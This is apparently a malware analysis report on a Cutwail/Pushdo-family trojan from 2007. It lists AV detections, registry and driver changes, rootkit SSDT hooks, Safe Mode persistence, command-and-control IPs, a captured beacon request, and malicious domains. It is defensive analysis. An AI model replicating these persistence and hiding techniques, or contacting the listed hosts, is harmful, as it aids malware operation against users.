File details
Filename: nax.exe
File size: 20480 bytes
MD5: 5eb708dbb4e3391435494d0f434fbbfd
SHA1: 41b911427cc4cd8d088c91e34dea804ba8c4c67f
QUOTEFile nax.exe received on 11.27.2007 06:42:30 (CET)
AhnLab-V3 2007.11.27.0 2007.11.27 -
AntiVir 7.6.0.34 2007.11.26 -
Authentium 4.93.8 2007.11.24 -
Avast 4.7.1074.0 2007.11.25 -
AVG 7.5.0.503 2007.11.26 Downloader.Agent.14.C
BitDefender 7.2 2007.11.27 -
CAT-QuickHeal 9.00 2007.11.26 -
ClamAV 0.91.2 2007.11.26 -
DrWeb 4.44.0.09170 2007.11.26 BackDoor.Bulknet.97
eSafe 7.0.15.0 2007.11.21 -
eTrust-Vet 31.3.5329 2007.11.26 -
Ewido 4.0 2007.11.26 -
FileAdvisor 1 2007.11.27 -
Fortinet 3.14.0.0 2007.11.27 -
F-Prot 4.4.2.54 2007.11.27 -
F-Secure 6.70.13030.0 2007.11.27 -
Ikarus T3.1.1.12 2007.11.27 -
Kaspersky 7.0.0.125 2007.11.27 -
McAfee 5171 2007.11.26 -
Microsoft 1.3007 2007.11.27 TrojanDropper:Win32/Cutwail.H
NOD32v2 2687 2007.11.26 -
Norman 5.80.02 2007.11.26 -
Panda 9.0.0.4 2007.11.26 -
Prevx1 V2 2007.11.27 -
Rising 20.20.10.00 2007.11.27 -
Sophos 4.23.0 2007.11.27 Troj/Pushdo-Gen
Sunbelt 2.2.907.0 2007.11.27 -
Symantec 10 2007.11.27 -
TheHacker 6.2.9.142 2007.11.26 -
VBA32 3.12.2.5 2007.11.23 -
VirusBuster 4.3.26:9 2007.11.26 -
Webwasher-Gateway 6.0.1 2007.11.27 -
Technical details
Registry changes.
- Adds a service called runtime2QUOTEHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Class"
Type: REG_SZ
Data: LegacyDriver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "ClassGUID"
Type: REG_SZ
Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "ConfigFlags"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "DeviceDesc"
Type: REG_SZ
Data: runtime
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Legacy"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000 "Service"
Type: REG_SZ
Data: runtime
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000\Control "*NewlyCreated*"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME\0000\Control "ActiveService"
Type: REG_SZ
Data: runtime
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2 "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Class"
Type: REG_SZ
Data: LegacyDriver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "ClassGUID"
Type: REG_SZ
Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "ConfigFlags"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "DeviceDesc"
Type: REG_SZ
Data: runtime2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Legacy"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000 "Service"
Type: REG_SZ
Data: runtime2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000\Control "*NewlyCreated*"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_RUNTIME2\0000\Control "ActiveService"
Type: REG_SZ
Data: runtime2
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "ImagePath"
Type: REG_SZ
Data: \??\C:\WINDOWS\System32\drivers\runtime.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_RUNTIME\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\runtime\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00 - Adds entries to an existing, legitimate service. Addition depends on the OS version. Known services are Ip6Fw, NetDetect or Secdrv.QUOTEHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Class"
Type: REG_SZ
Data: LegacyDriver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "ClassGUID"
Type: REG_SZ
Data: {8ECC055D-047F-11D1-A537-0000F8753ED1}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "ConfigFlags"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "DeviceDesc"
Type: REG_SZ
Data: IPv6 Windows Firewall Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Legacy"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000 "Service"
Type: REG_SZ
Data: Ip6Fw
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000\Control "*NewlyCreated*"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_IP6FW\0000\Control "ActiveService"
Type: REG_SZ
Data: Ip6Fw
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_IP6FW\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Ip6Fw\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00 - Loads in Safe mode.
The registry keys are hidden using rootkit technology as seen in the Gmer scan lower on the page.
Overwrites c:\WINDOWS\system32\drivers\ip6fw.sysQUOTEC:\WINDOWS\system32\drivers\runtime.sys
C:\WINDOWS\system32\drivers\runtime2.sys
c:\WINDOWS\system32\0_exception.nls
c:\WINDOWS\Temp\startdrv.exe
The file depends on the OS version, known files are :
- %SYSTEM%\drivers\netdtect.sys
- %SYSTEM%\drivers\ip6fw.sys
- %SYSTEM%\drivers\secdrv.sys
Notes
The trojan loads "runtime2.sys" into kernel memory as a device driver. The installer is deleted after running. If an existing version is already detected, the trojan may drop the file as C:\WINDOWS\system32\drivers\runtime2.sy_
Replacement of the old driver is then requested by the installer.
c:\WINDOWS\Temp\startdrv.exe is an unpacked version of the trojan, it also hides files and registry keys relevant to the rootkit. It creates a startup entry to ensure that the driver loads on every boot, even in Safe Mode.
The driver performs a check at system startup and reinstates any of the registry entries if they have been removed.QUOTEHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "startdrv"
Type: REG_SZ
Data: C:\WINDOWS\Temp\startdrv.exe
The trojan also contains code for a downloader. The code is injected into a hidden Internet Explorer process. It usually attempts to update itself to the latest version.
It also sends a number of parameters to one of the servers below and tries to download a file.
The downloaded file can contain up to 3 executables. They are either saved to %temp%QUOTE66.246.252.213
67.18.114.98
74.52.122.130
208.66.194.221
208.66.194.241
66.246.252.215
66.246.72.173
The file has been deleted after execution but we still can see a trace of it in the MUI cache.QUOTEInternet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: 62.72.1243.static.theplanet.com (67.18.114.98)
Transmission Control Protocol, Src Port: 1027 (1027), Dst Port: http (80), Seq: 1, Ack: 1, Len: 77
Hypertext Transfer Protocol
GET /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0 HTTP/1.0\r\n
Request Method: GET
Request URI: /s_80_0?hdd=202020202020202020202020202020202020202003&gen=0
Request Version: HTTP/1.0
\r\n
216.195.61.211 is then contacted to obtain a list of mailservers, webservers and other details.QUOTEHKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache "C:\DOCUME~1\KLY\LOCALS~1\Temp\857913.exe"
Type: REG_SZ
Data: 857913
The trojan has it's own SMTP engine and sends out bulk emails to the obtained recipients.
Rootkit Scan
QUOTEGMER 1.0.14.13626 - http://www.gmer.net
Rootkit scan 2007-11-27 18:21:24
Windows 5.1.2600 Service Pack 2
---- System - GMER 1.0.14 ----
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwDeleteValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwEnumerateValueKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwOpenKey
SSDT \??\C:\WINDOWS\System32\drivers\runtime2.sys ZwSetValueKey
---- Kernel code sections - GMER 1.0.14 ----
? C:\WINDOWS\System32\drivers\runtime.sys The system cannot find the file specified. !
? C:\WINDOWS\System32\drivers\runtime2.sys Access is denied.
---- Devices - GMER 1.0.14 ----
Device \FileSystem\Ntfs \Ntfs runtime2.sys
Device \FileSystem\Fastfat \FatCdrom runtime2.sys
Device \Driver\Tcpip \Device\Ip runtime.sys
Device \Driver\Tcpip \Device\Tcp runtime.sys
Device \Driver\Tcpip \Device\Udp runtime.sys
Device \Driver\Tcpip \Device\RawIp runtime.sys
Device \Driver\Tcpip \Device\IPMULTICAST runtime.sys
Device \FileSystem\Fastfat \Fat runtime2.sys
---- Processes - GMER 1.0.14 ----
Process C:\Program Files\Internet Explorer\iexplore.exe (*** hidden *** ) 484
---- Services - GMER 1.0.14 ----
Service C:\WINDOWS\system32\drivers\runtime2.sys (*** hidden *** ) [SYSTEM] runtime2
---- Registry - GMER 1.0.14 ----
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\runtime2.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\runtime2.sys@ Driver
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@ImagePath \SystemRoot\system32\drivers\runtime2.sys
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@Type 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@ErrorControl 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@Start 1
Reg HKLM\SYSTEM\CurrentControlSet\Services\runtime2@DependOnGroup File System
---- Files - GMER 1.0.14 ----
File C:\WINDOWS\system32\drivers\runtime2.sys 34816 bytes
---- EOF - GMER 1.0.14 ----
Offending IP
203.117.111.102
QUOTE
IP Location - Singapore Starhubinternet
Reverse IP: 20 other sites hosted on this server
inetnum: 203.117.0.0 - 203.117.255.255
netname: STARHUBINTERNET-SG
descr: root
country: SG
admin-c: NS110-AP
tech-c: NS110-AP
mnt-by: MAINT-AS4657-AP
status: ALLOCATED NON-PORTABLE
source: APNIC
person: NOC SHI
nic-hdl: NS110-AP
address: 19 TaiSeng Drive
address: Singapore 535222
phone: +65 6825 7878
fax-no: +65 6821 6012
country: SG
mnt-by: MAINT-AS4657-AP
source: APNIC
Reverse IP: 20 other sites hosted on this server
inetnum: 203.117.0.0 - 203.117.255.255
netname: STARHUBINTERNET-SG
descr: root
country: SG
admin-c: NS110-AP
tech-c: NS110-AP
mnt-by: MAINT-AS4657-AP
status: ALLOCATED NON-PORTABLE
source: APNIC
person: NOC SHI
nic-hdl: NS110-AP
address: 19 TaiSeng Drive
address: Singapore 535222
phone: +65 6825 7878
fax-no: +65 6821 6012
country: SG
mnt-by: MAINT-AS4657-AP
source: APNIC
Websites
1. 13fr.info
2. 1sense.info
3. 1speed.info
4. 2speed.info
5. Adminhost.info
6. D0r.info
7. Ddosmanager.org
8. Fastwiretransfer.info
9. Googletraff.info
10. Hacktrade.info
11. Hopana.info
12. Logartos.org
13. Miclosoft.org
14. My-loads.info
15. New-screensavers.com
16. Notsex.info
17. Renaissanceca.us
18. Super-proxy.info
19. Watch77.com
20. Xopfig.info
21. 23o.info
Some well known malware domains live on the IP.